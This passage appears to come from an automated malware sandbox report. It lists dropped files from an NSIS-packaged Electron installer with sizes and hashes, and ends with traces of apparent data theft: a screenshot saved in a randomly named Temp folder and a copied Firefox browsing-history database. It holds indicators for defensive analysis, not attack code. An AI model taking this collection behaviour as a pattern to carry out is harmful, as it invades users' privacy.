                                                                                                                                                                                                                        1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\nl.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        114KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        cf6b1cbfd669e9461553974ba37a475e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b33867e9bc7fd88ca98a76dc4bd756bcf18887aa

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\pl.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        125KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        644c0ace25d6e532b56510a736c6bc2c

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1bd0fec952107b493da04c46423da634ff3e1504

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\pt-BR.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        119KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        88ad860c73676ffb4025b5c691f29942

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3c5e5b999ea7153ccdd1b4cc7b6162de3456b558

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\pt-PT.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        123KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ecd84b296d3bb312ee18e21017311986

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f5625523f85c10723750834a54ff59a2dd886fb3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\ro.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        122KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        24b01a438a3ab9699d4ca97c081b5e82

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0d0b082544d23425a74199fb0a6c11192f0bdf7d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\ru.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        195KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        75457b95d2bb03891232dae7db886387

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        e5a7569df7f91533703626d167ecc8cddbd27205

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\sk.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        127KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b35daa0bd9627ca88b413a5af7c6b4a4

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d5efdcbc7ca17de29f3075f6434f31ab2e895826

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\sl.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        121KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        e015b6f5042be2dc96a4e23dcf035502

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7946509eed8db1e4c1f3da99ffe7155c86fdb4d6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\sr.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        185KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        af7083f2a4bd95dcbe792efade352662

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        dc69aa831836016f6e66c6079931503d534a7862

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\sv.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        111KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        41e76f7775fc9a2d6e3c02c46e9b32f6

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        088c15c74a68bee69682bf89c31055332b68c84a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\sw.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        114KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        99e385ebc1ef8d3daddb3a171fa79edf

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\ta.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        290KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        31dada843d0b4f9a66b184cb6d7b8b92

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0320b31981043c6e4c17470bf2ff4c7488553511

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\te.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        270KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        793a87d41cde6e6d1bb086284f69733b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d887e3842b664f55b7308427aa6f5bf0b352d879

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\th.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        227KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        43edd25f67ce6e6cea5373009ff0a1f8

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        ed72ca6620cf23837e1334be50ccf616806bc5a2

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\tr.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        117KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        40491896ad21543f339467186c5efb40

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        695dde7cc35056dcbf0a533aff8299d4c6b61bd8

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\uk.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        198KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d791b1ecf2931b2fb0c31aac170c7cdc

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        02be115a9ff94fe5250651b6de4323eafc44fce1

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\vi.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        140KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        69c8796439192577f48bd249175aaf37

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        97c52088ca69dada593db0e42b2135d264646454

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\zh-CN.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        101KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        098d656a4f4bd8240bed10e7678186c7

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0c19ab62b4262f1b51558e8aaa79e7741f73393a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\locales\zh-TW.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        101KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c2c35fcedc3708b5bcadf36587393002

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        31d72402cbd44ceb921cedd806259c2cd14e411f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\resources.pak

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.4MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        25ab4e07b71c8db908f15618ab8f4841

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b6c2a538390c21c89b465011f68ee3520a087255

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        1b0059f71d8eaf4e05e29e413c70352ced68b21896f0bcc00d6156543ecca54e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        61ef5d6642b28907422e8f813b6c59d022728857a3c4fde19d776f630328803e98e7b6ef7d83b6f5a14d7f209e12c8447735795dcf365a7c2f03056d6c61ece3

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\resources\app.asar

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        320KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2d602d8ab3eae1a0a9dfae8bec71c625

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c39f26f968a247baed52e2afdf85c7f78316e575

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        59b04c7fe06e72f5d635faac1c1fb88622067c22cca645183a59afc20751a9a9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8e4380295f9c700ada400771ede6ff9a97b04ba1199df9823891d526b40df083fc57db3ddecff543c4df55dede1b64928f3e737b2a95b35895a7b9435326cea3

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\resources\elevate.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        105KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        792b92c8ad13c46f27c7ced0810694df

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d8d449b92de20a57df722df46435ba4553ecc802

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\snapshot_blob.bin

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        342KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c9ab741bbef53fa0e84952b8891a5f5a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        e2dcb8d034e07243537c86371de0c52bce62cee1

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\swiftshader\libEGL.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        384KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        846cc2eac654c0c07cc8385c3ecbbe9e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        958ecfff237aaf1b97c8a2886682b388cb4cc0b6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0f4efc59a65733cf1e8670ad7f13153e9f9463d40d02972f20e53c62667076e6

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        67fb5940a67d1f11e8f31a398e02ada2ed59b77aea0581f49d2d1039df1f48dccbb64131fa13c0810093e73853f25544ba44029bf41e3ba21788e39de46a6e38

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\swiftshader\libGLESv2.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a278e192b332e2007221501d91142d0f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        9900b08824762dbdd01647bde7de86ab1a54c86b

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        017745c674af6ec01ba18a86395c01d8661183be96984f02ba565b2c70fa0239

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        724eccbcb550fe8ed29d5a8fc51e9af87f92c5b930987ca5a8c85cc37998a2ae31dff5252ccdb9a9f4209197a9a9edeca39b249e90cf53c6eaa944fda0f89524

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\v8_context_snapshot.bin

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        656KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        47014c0f81bad6d216c617c9c63bf040

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\vk_swiftshader.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        640KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9acbef7d5eab7486fed176b95e97c725

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        86c1ce556882a1e58074465ba959e0c87fce0e06

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        14db9a16bcb6424cae6395954006412d82868d9e15ba82d77ca62930e0a4836f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        39e08a402f10c3e6b7a92c41426ef6e69f9b4516796b908697be9eadc9fb4b2a9efa31c3b20cf71ce457e384c0053167a8b8c6908e5e4b959187a6f6dd97d744

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\vk_swiftshader_icd.json

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        106B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        8642dd3a87e2de6e991fae08458e302b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        9c06735c31cec00600fd763a92f8112d085bd12a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\7z-out\vulkan-1.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        819KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b91586bd80e057a7f62bdc4422744812

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        a1df644421ece2e740e5bf0ed98b4f269fd85c39

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\StdUtils.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c6a6e03f77c313b267498515488c5740

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3d49fc2784b9450962ed6b82b46e9c3c957d7c15

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\System.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0d7ad4f45dc6f5aa87f606d0331c6901

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        48df0911f0484cbe2a8cdd5362140b63c41ee457

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nsrE281.tmp\nsis7z.dll

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        424KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        80e44ce4895304c6a3a831310fbf8cd0

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        36bd49ae21c460be5753a904b4501f1abca53508

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vZpg95hxoNQbTuTQ0UuM\System\NUPNSVML - 2023-12-16_142747.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        26KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0aa57d95d90f2d469f3c7f144ffc8eb1

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3a6eb8370c92efac9d755f8c5257ac7aa955db43

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        fb071ace90f1e900ac85cd945e7296b21a1ad8351e672c3346afc442ad92ac67

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        0de33411eb6e1c85dce2a9095f2c961b71f8aa9e230f8ae07fcc99d897b9def813732dc43202d9d42d59e371e6611b6aaf30f7e0cbebbca5a1e52ad538a82eda

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        a58fe820b86e4746173d3032bd6f2363

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b9c66aa7e3585e72e792933d97e7703edea116a0

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        fc2901777dd87713162a63356431a805f209a14a2962b65c860e6d30cc4d777e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ecfa6d3466b182d777f1134796ca5be992e629c6e78a8e8c218f96e7167a445205e9066a00bd33bbd356f2d0939a06a3902a21fdd03c144ed30c43d94324bde2

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c5c4ebc75b267ac1583327676f9a3f19

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b25be8f1afb6bf9acbc37724c6a2b7cf31b7c96f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        668b7aa92d208e52e0699f6df460b842716b0409723e8c0456187328f922a2b6

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ed41853c4465312f0288edf5b31598844eb8140a68ebf8df6beaea3cd59d97736f0d7b2b9c821d95ef1fe3c94c9d4be0ffc40ad3dc58d9557ec52301b9792150

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QV7K5JDIZ2FHIN4CFG94.temp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0d96560a4f44b0ac5089b6782db84912

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        cd8e7aca481101caa3697523f08682e7455ffcad

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        678c4312c4382271c8f3f29a69d78215a54c1e0bf0170c058de58a988602f2de

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        3ae7b971d4882cd8f790b8e4f72c093b8d3f5a8ddffd65a827558239440f84a70653e77e8b6719c438760b298a352c44759197430170324852ca9be8a66a561d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x3x6afp6.default-release\places.sqlite_tmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5.0MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c8c0b757369aa7f76e8fcae360bd20a0

